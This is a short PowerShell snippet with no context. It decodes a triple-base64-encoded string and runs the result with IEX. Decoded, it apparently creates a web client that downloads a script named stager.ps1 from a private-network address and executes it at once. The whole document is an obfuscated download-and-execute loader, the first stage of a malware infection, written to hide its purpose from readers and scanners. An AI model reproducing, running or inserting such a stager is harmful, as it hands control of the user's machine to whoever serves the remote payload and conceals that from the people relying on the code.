
$enc = "UTJsQlowbERRV3RaTW5od1dsYzFNRWxFTUdkVWJWWXpURlU1YVdGdFZtcGtRMEpVWlZoT01GcFhNSFZVYlZZd1RHeGtiRmxyVG5OaFYxWjFaRUZ2WjBsRFFXZEtTRlo1WWtOQk9VbERTbTlrU0ZKM1QyazRkazFVUVhWTlF6UjNUR3BKZG1NelVtaGFNbFo1VEc1Q2VrMVRTVXRKUTBGblNVVnNSbGREUVd0Wk1uaHdXbGMxTUV4clVuWmtNalZ6WWpKR2ExVXpVbmxoVnpWdVMwTlNNV050ZDNCRGFVRm5TVU5CUFE9PQ=="
for($i=0; $i -lt 3; $i++){
    $enc = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($enc))
}
IEX $enc
